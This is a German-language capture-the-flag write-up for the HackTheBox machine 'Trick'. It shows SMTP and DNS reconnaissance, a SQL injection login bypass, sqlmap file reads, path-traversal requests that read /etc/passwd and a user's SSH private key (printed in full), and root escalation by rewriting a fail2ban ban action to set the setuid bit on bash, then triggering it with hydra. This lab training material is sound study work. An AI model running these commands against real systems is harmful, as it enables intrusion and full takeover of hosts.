Writeup HackTheBox Maschine "Trick"

September 28, 2022 — #CTF #HTB #DE

Scans

MetaSploit

msf6 auxiliary(scanner/smtp/smtp_enum) > run

[*] 10.10.11.166:25       - 10.10.11.166:25 Banner: 220 debian.localdomain ESMTP Postfix (Debian/GNU)

[+] 10.10.11.166:25       - 10.10.11.166:25 Users found: , _apt, avahi, backup, bin, colord, daemon, dnsmasq, games, geoclue, gnats, hplip, irc, list, lp, mail, man, messagebus, mysql, news, nobody, postfix, postmaster, proxy, pulse, rtkit, saned, speech-dispatcher, sshd, sync, sys, systemd-coredump, systemd-network, systemd-resolve, systemd-timesync, tss, usbmux, uucp, www-data
[*] 10.10.11.166:25       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Nmap - SMTP Script

└─# nmap -script smtp-commands.nse 10.10.11.166
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-18 13:42 CEST
Nmap scan report for 10.10.11.166
Host is up (0.042s latency).
Not shown: 996 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
25/tcp open  smtp
|_smtp-commands: debian.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
53/tcp open  domain
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 11.99 seconds
zsh: segmentation fault  nmap -script smtp-commands.nse 10.10.11.166

Nmap

└─# nmap 10.10.11.166           
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-18 13:33 CEST
Nmap scan report for 10.10.11.166
Host is up (0.091s latency).
Not shown: 996 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
25/tcp open  smtp
53/tcp open  domain
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 6.01 seconds

WFUZZ

└─# wfuzz -w /usr/share/wordlists/wfuzz/general/common.txt --hc 404 http://10.10.11.166/FUZZ
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.11.166/FUZZ
Total requests: 951

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                               
=====================================================================

000000076:   301        7 L      12 W       185 Ch      "assets"                                                              
000000224:   301        7 L      12 W       185 Ch      "css"                                                                 
000000456:   301        7 L      12 W       185 Ch      "js"                                                                  

Total time: 0
Processed Requests: 951
Filtered Requests: 948
Requests/sec.: 0

SMTP

Telnet

EHLO all
250-debian.localdomain
250-PIPELINING
250-SIZE 10240000
250-VRFY
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250-DSN
250-SMTPUTF8
250 CHUNKING

DNS

AXFR zone-transfer request

└─# dig axfr trick.htb @10.10.11.166

; <<>> DiG 9.18.6-2-Debian <<>> axfr trick.htb @10.10.11.166
;; global options: +cmd
trick.htb.              604800  IN      SOA     trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
trick.htb.              604800  IN      NS      trick.htb.
trick.htb.              604800  IN      A       127.0.0.1
trick.htb.              604800  IN      AAAA    ::1
preprod-payroll.trick.htb. 604800 IN    CNAME   trick.htb.
trick.htb.              604800  IN      SOA     trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
;; Query time: 236 msec
;; SERVER: 10.10.11.166#53(10.10.11.166) (TCP)
;; WHEN: Sun Sep 18 14:23:54 CEST 2022
;; XFR size: 6 records (messages 1, bytes 231)

Web

SQL Injection - Manual

Username: Test

Password: ‘

Notice: Trying to get property 'num_rows' of non-object in /var/www/payroll/admin_class.php on line 21
3

This one works for the admin GUI:

Username: Test

Password: 'OR 1=1 OR 1='test

Real User:

Enemigosss

SQLMAP

Doesn’t work:

sqlmap -u "http://preprod-payroll.trick.htb/ajax.php?action=login" --method POST --data "username=test&password=hi" -p "password"

OS-Shell:

sqlmap -u "http://preprod-payroll.trick.htb/ajax.php?action=login" --method POST --data "username=test&password=hi" -p "password"

Find other domains

Preprod- domains

sed 's/^/preprod-/' /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt > ./preprod-domains.txt
ffuf -w ./preprod-domains.txt -u http://trick.htb -H "Host: FUZZ.trick.htb"

Bei jeder Domain gibts eine Response 200 👎:

preprod-redmine         [Status: 200, Size: 5480, Words: 1697, Lines: 84, Duration: 99ms]
preprod-game            [Status: 200, Size: 5480, Words: 1697, Lines: 84, Duration: 100ms]
preprod-citrix          [Status: 200, Size: 5480, Words: 1697, Lines: 84, Duration: 99ms]
preprod-es              [Status: 200, Size: 5480, Words: 1697, Lines: 84, Duration: 99ms]
preprod-stream          [Status: 200, Size: 5480, Words: 1697, Lines: 84, Duration: 100ms]
preprod-dl              [Status: 200, Size: 5480, Words: 1697, Lines: 84, Duration: 99ms]
preprod-qa              [Status: 200, Size: 5480, Words: 1697, Lines: 84, Duration: 99ms]
preprod-irc             [Status: 200, Size: 5480, Words: 1697, Lines: 84, Duration: 100ms]
preprod-billing         [Status: 200, Size: 5480, Words: 1697, Lines: 84, Duration: 99ms]
preprod-webdisk.m       [Status: 200, Size: 5480, Words: 1697, Lines: 84, Duration: 100ms]

Darum mit -fs 5480 diese Requests rausfiltern, welche genau 5480 bytes in der response haben:

ffuf -w ./preprod-domains.txt -u http://trick.htb -H "Host: FUZZ.trick.htb" -fs 5480

└─# ffuf -w ./preprod-domains.txt -u http://trick.htb -H "Host: FUZZ.trick.htb" -fs 5480

        /'___\  /'___\           /'___\       
       /\ __/ /\ __/  __  __  /\ __/       
       \ \ ,__\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ _/ \ \ _/\ \ _\ \ \ \ _/      
         \ _\   \ _\  \ ____/  \ _\       
          \/_/    \/_/   \/___/    \/_/       

       v1.5.0 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://trick.htb
 :: Wordlist         : FUZZ: ./preprod-domains.txt
 :: Header           : Host: FUZZ.trick.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
 :: Filter           : Response size: 5480
________________________________________________

preprod-marketing       [Status: 200, Size: 9660, Words: 3007, Lines: 179, Duration: 121ms]
:: Progress: [4989/4989] :: Job [1/1] :: 343 req/sec :: Duration: [0:00:13] :: Errors: 0 ::

Found! preprod-marketing.trick.htb

Read Files

sqlmap --url "preprod-payroll.trick.htb/ajax.php?action=login" --data "username=test&password=test" --file-read "/var/www/market/index.php" --batch

Über insecure get parameter → Page ist einfach ein Pfad auf dem System

curl "preprod-marketing.trick.htb/index.php?page=..././..././..././etc/passwd"

Flag finden → Benutzername michael findet man in /etc/passwd

curl "preprod-marketing.trick.htb/index.php?page=..././..././..././home/michael/user.txt"

User Flag: b9ee***************

Private Key finden (für SSH verbindung):

curl "preprod-marketing.trick.htb/index.php?page=..././..././..././home/michael/.ssh/id_rsa"
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEAwI9YLFRKT6JFTSqPt2/+7mgg5HpSwzHZwu95Nqh1Gu4+9P+ohLtz
c4jtky6wYGzlxKHg/Q5ehozs9TgNWPVKh+j92WdCNPvdzaQqYKxw4Fwd3K7F4JsnZaJk2G
YQ2re/gTrNElMAqURSCVydx/UvGCNT9dwQ4zna4sxIZF4HpwRt1T74wioqIX3EAYCCZcf+
4gAYBhUQTYeJlYpDVfbbRH2yD73x7NcICp5iIYrdS455nARJtPHYkO9eobmyamyNDgAia/
Ukn75SroKGUMdiJHnd+m1jW5mGotQRxkATWMY5qFOiKglnws/jgdxpDV9K3iDTPWXFwtK4
1kC+t4a8sQAAA8hzFJk2cxSZNgAAAAdzc2gtcnNhAAABAQDAj1gsVEpPokVNKo+3b/7uaC
DkelLDMdnC73k2qHUa7j70/6iEu3NziO2TLrBgbOXEoeD9Dl6GjOz1OA1Y9UqH6P3ZZ0I0
+93NpCpgrHDgXB3crsXgmydlomTYZhDat7+BOs0SUwCpRFIJXJ3H9S8YI1P13BDjOdrizE
hkXgenBG3VPvjCKiohfcQBgIJlx/7iABgGFRBNh4mVikNV9ttEfbIPvfHs1wgKnmIhit1L
jnmcBEm08diQ716hubJqbI0OACJr9SSfvlKugoZQx2Iked36bWNbmYai1BHGQBNYxjmoU6
IqCWfCz+OB3GkNX0reINM9ZcXC0rjWQL63hryxAAAAAwEAAQAAAQASAVVNT9Ri/dldDc3C
aUZ9JF9u/cEfX1ntUFcVNUs96WkZn44yWxTAiN0uFf+IBKa3bCuNffp4ulSt2T/mQYlmi/
KwkWcvbR2gTOlpgLZNRE/GgtEd32QfrL+hPGn3CZdujgD+5aP6L9k75t0aBWMR7ru7EYjC
tnYxHsjmGaS9iRLpo79lwmIDHpu2fSdVpphAmsaYtVFPSwf01VlEZvIEWAEY6qv7r455Ge
U+38O714987fRe4+jcfSpCTFB0fQkNArHCKiHRjYFCWVCBWuYkVlGYXLVlUcYVezS+ouM0
fHbE5GMyJf6+/8P06MbAdZ1+5nWRmdtLOFKF1rpHh43BAAAAgQDJ6xWCdmx5DGsHmkhG1V
PH+7+Oono2E7cgBv7GIqpdxRsozETjqzDlMYGnhk9oCG8v8oiXUVlM0e4jUOmnqaCvdDTS
3AZ4FVonhCl5DFVPEz4UdlKgHS0LZoJuz4yq2YEt5DcSixuS+Nr3aFUTl3SxOxD7T4tKXA
fvjlQQh81veQAAAIEA6UE9xt6D4YXwFmjKo+5KQpasJquMVrLcxKyAlNpLNxYN8LzGS0sT
AuNHUSgX/tcNxg1yYHeHTu868/LUTe8l3Sb268YaOnxEbmkPQbBscDerqEAPOvwHD9rrgn
In16n3kMFSFaU2bCkzaLGQ+hoD5QJXeVMt6a/5ztUWQZCJXkcAAACBANNWO6MfEDxYr9DP
JkCbANS5fRVNVi0Lx+BSFyEKs2ThJqvlhnxBs43QxBX0j4BkqFUfuJ/YzySvfVNPtSb0XN
jsj51hLkyTIOBEVxNjDcPWOj5470u21X8qx2F3M4+YGGH+mka7P+VVfvJDZa67XNHzrxi+
IJhaN0D5bVMdjjFHAAAADW1pY2hhZWxAdHJpY2sBAgMEBQ==
-----END OPENSSH PRIVATE KEY-----

Privilege Escalation

Was kann man als root ausführen?

michael@trick:~$ sudo -l
Matching Defaults entries for michael on trick:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User michael may run the following commands on trick:
    (root) NOPASSWD: /etc/init.d/fail2ban restart

→ Man kann den Service fail2ban als root neu starten

Action File bearbeiten → neue Action bei ban → chmod u+s /bin/bash → wenn das ausgeführt wird, kann jeder Benutzer bash als root starten.

Befehl für das automatische bearbeiten (File wird von Hack the Box immer wieder zurückgesetzt):

sed "s/<iptables> -I f2b-<name> 1 -s <ip> -j <blocktype>/chmod u+s \/bin\/bash/g" /etc/fail2ban/action.d/iptables-multiport.conf > config.conf
rm -f /etc/fail2ban/action.d/iptables-multiport.conf
mv config.conf /etc/fail2ban/action.d/iptables-multiport.conf
sudo /etc/init.d/fail2ban restart

Jetzt actionban triggern:

Entweder SSH machen und 5 Mal PW falsch eingeben
Oder einfach hydra 10.10.11.166 ssh -l root -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt

Dann bash als root ausführen sudo /bin/bash und root flag lesen: cat /root/flag.txt

Root Flag: d875*********

iptables-multiport.conf sieht am Ende so aus:

michael@trick:~$ cat /etc/fail2ban/action.d/iptables-multiport.conf
# Fail2Ban configuration file
#
# Author: Cyril Jaquier
# Modified by Yaroslav Halchenko for multiport banning
#

[INCLUDES]

before = iptables-common.conf

[Definition]

# Option:  actionstart
# Notes.:  command executed once at the start of Fail2Ban.
# Values:  CMD
#
actionstart = <iptables> -N f2b-<name>
              <iptables> -A f2b-<name> -j <returntype>
              <iptables> -I <chain> -p <protocol> -m multiport --dports <port> -j f2b-<name>

# Option:  actionstop
# Notes.:  command executed once at the end of Fail2Ban
# Values:  CMD
#
actionstop = <iptables> -D <chain> -p <protocol> -m multiport --dports <port> -j f2b-<name>
             <actionflush>
             <iptables> -X f2b-<name>

# Option:  actioncheck
# Notes.:  command executed once before each actionban command
# Values:  CMD
#
actioncheck = <iptables> -n -L <chain> | grep -q 'f2b-<name>[ \t]'

# Option:  actionban
# Notes.:  command executed when banning an IP. Take care that the
#          command is executed with Fail2Ban user rights.
# Tags:    See jail.conf(5) man page
# Values:  CMD
#
actionban = chmod u+s /bin/bash

# Option:  actionunban
# Notes.:  command executed when unbanning an IP. Take care that the
#          command is executed with Fail2Ban user rights.
# Tags:    See jail.conf(5) man page
# Values:  CMD
#
actionunban = <iptables> -D f2b-<name> -s <ip> -j <blocktype>

[Init]